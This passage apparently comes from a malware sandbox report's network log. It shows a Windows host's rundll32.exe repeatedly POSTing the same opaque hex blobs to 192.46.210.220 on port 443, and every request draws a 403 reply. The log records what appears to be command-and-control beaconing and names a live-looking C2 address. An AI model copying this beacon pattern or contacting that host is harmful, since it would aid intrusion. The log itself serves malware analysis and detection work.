2021-10-28 02:59:22 UTC | 204 | OUT | Data Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
2021-10-28 02:59:22 UTC | 209 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:59:22 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
42 | 192.168.2.6 | 49936 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:59:25 UTC | 209 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4862
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:59:25 UTC | 209 | OUT | Data Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
2021-10-28 02:59:25 UTC | 214 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:59:25 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
43 | 192.168.2.6 | 49941 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:59:26 UTC | 214 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4850
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:59:26 UTC | 214 | OUT | Data Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
2021-10-28 02:59:26 UTC | 219 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:59:26 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
44 | 192.168.2.6 | 49961 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:59:29 UTC | 219 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4862
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:59:29 UTC | 219 | OUT | Data Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
2021-10-28 02:59:29 UTC | 224 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:59:29 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
45 | 192.168.2.6 | 49967 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:59:30 UTC | 224 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4850
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:59:30 UTC | 224 | OUT | Data Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
2021-10-28 02:59:30 UTC | 229 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:59:30 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
46 | 192.168.2.6 | 49982 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:59:34 UTC | 229 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4862
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:59:34 UTC | 229 | OUT | Data Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
2021-10-28 02:59:35 UTC | 239 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:59:35 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
47 | 192.168.2.6 | 49985 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:59:35 UTC | 234 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4850
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:59:35 UTC | 234 | OUT | Data Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
2021-10-28 02:59:35 UTC | 239 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:59:35 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
48 | 192.168.2.6 | 49998 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:59:38 UTC | 239 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4862
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:59:38 UTC | 239 | OUT | Data Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
2021-10-28 02:59:39 UTC | 249 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:59:39 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
49 | 192.168.2.6 | 49999 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:59:38 UTC | 244 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4850
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:59:38 UTC | 244 | OUT | Data Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
2021-10-28 02:59:39 UTC | 249 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:59:39 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.6 | 49773 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:58:11 UTC | 24 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4850
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:58:11 UTC | 25 | OUT | Data Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:58:11 UTC29INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:58:11 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
50          192.168.2.6  50008        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:59:42 UTC  249                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4862
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:59:42 UTC  249                 OUT        Data Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:59:43 UTC  259                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:59:43 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
51          192.168.2.6  50009        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:59:42 UTC  254                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4850
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:59:42 UTC  254                 OUT        Data Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:59:43 UTC  259                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:59:43 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
52          192.168.2.6  50016        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:59:46 UTC  259                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4862
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:59:46 UTC  259                 OUT        Data Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:59:47 UTC  269                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:59:46 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
53          192.168.2.6  50017        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:59:46 UTC  264                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4850
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:59:46 UTC  264                 OUT        Data Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:59:47 UTC  269                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:59:47 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
54          192.168.2.6  50025        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:59:50 UTC  269                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4862
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:59:50 UTC  269                 OUT        Data Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:59:50 UTC  279                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:59:50 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
55          192.168.2.6  50024        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:59:50 UTC  274                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
